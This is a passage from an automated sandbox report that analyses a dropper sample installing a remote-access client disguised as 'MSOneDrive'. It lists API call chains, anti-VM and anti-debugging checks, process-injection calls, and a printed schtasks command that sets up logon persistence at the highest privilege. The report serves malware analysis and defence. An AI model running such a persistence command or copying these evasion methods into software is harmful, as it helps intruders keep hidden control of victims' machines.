                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_11149BF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11105AE0 IsIconic,13_2_11105AE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11129D80 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,13_2_11129D80
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110C1C00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11149FF0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,13_2_11149FF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11024350 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,13_2_11024350
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11114780 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_11114780
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_110247A0 IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_110247A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_111066E0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,13_2_111066E0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11022970 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,13_2_11022970
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_11081000
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110AECE0 Sleep,ExitProcess,11_2_110AECE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110AECE0 Sleep,ExitProcess,13_2_110AECE0
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-10565
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-10565
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeWindow / User API: threadDelayed 461Jump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeWindow / User API: threadDelayed 8373Jump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\icmp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\wiatrace.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\ir41_qcx.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\msvcp140_codecvt_ids.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\wfapigp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\ir50_32.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\winrssrv.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\winrsmgr.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\msvcr100_clr0400.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\getuname.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeEvaded block: after key decisiongraph_3-10702
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-87296
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-87654
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-87960
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88012
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88175
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88174
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88529
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-82866
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI coverage: 6.0 %
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI coverage: 2.9 %
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe TID: 7448Thread sleep time: -115250s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe TID: 7452Thread sleep time: -34400s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe TID: 7448Thread sleep time: -2093250s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C811780 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C81186Fh11_2_6C811780
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C8F905 FindFirstFileExW,3_2_00C8F905
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11061140
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,11_2_11065870
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110B3B00
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102BB50
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111180C0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_110FE450
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102BB50
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_11061140
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,13_2_11065870
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110B3B00
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111180C0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_110FE450
Source: HTCTL32.DLL.3.dr | Binary or memory string: VMware
Source: client32.exe, 0000000B.00000002.3743777363.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW7
Source: client32.exe, 0000000B.00000002.3743777363.000000000107E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW|
Source: HTCTL32.DLL.3.dr | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.3.dr | Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.3743777363.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.3.dr | Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1327778384.00000000010E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: client32.exe, 0000000D.00000003.1389862355.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000D.00000002.1390690669.0000000000B05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1328551007.00000000010E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 00000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1327778384.00000000010E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | API call chain: ExitProcess graph end node | graph_3-10752
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | API call chain: ExitProcess graph end node | graph_11-83495
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | API call chain: ExitProcess graph end node | graph_11-88570
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C87884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C87884
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110AE550 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,11_2_110AE550
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_11081000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C81000 lstrcmpA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,3_2_00C81000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C8D978 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C8D978
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C87A11 SetUnhandledExceptionFilter,3_2_00C87A11
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C86F73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C86F73
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1102F520 _NSMClient32@8,SetUnhandledExceptionFilter,11_2_1102F520
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1108C020 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,11_2_1108C020
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1115C769
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11150781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_11150781
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1102F520 _NSMClient32@8,SetUnhandledExceptionFilter,13_2_1102F520
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1108C020 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,13_2_1108C020
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_1115C769
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11150781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11150781
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: PostMessageA,GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe 11_2_1102E710
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: PostMessageA,GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe 13_2_1102E710
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110E9400 GetTickCount,LogonUserA,GetTickCount,GetLastError,11_2_110E9400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C81A80 GetProcessHeap,RegOpenKeyW,lstrlenW,RegSetValueExW,RegCloseKey,GetProcessHeap,GetProcessHeap,HeapAlloc,GetSystemDirectoryW,HeapFree,GetProcessHeap,HeapAlloc,wsprintfW,GetProcessHeap,HeapAlloc,HeapFree,wsprintfW,ShellExecuteW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00C81A80
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_111058F0 GetKeyState,DeviceIoControl,keybd_event,11_2_111058F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110964D0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_110964D0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11096C50 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,11_2_11096C50
Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | Binary or memory string: ProgmanL
Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | Binary or memory string: Progman
Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | Binary or memory string: Shell_TrayWndTraceRunpluginTimeouth^
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C87B48 cpuid 3_2_00C87B48
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,11_2_11162513
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoA,11_2_11159D6E
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_11161FE8
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,11_2_11162184
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_111621DF
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,11_2_111620DD
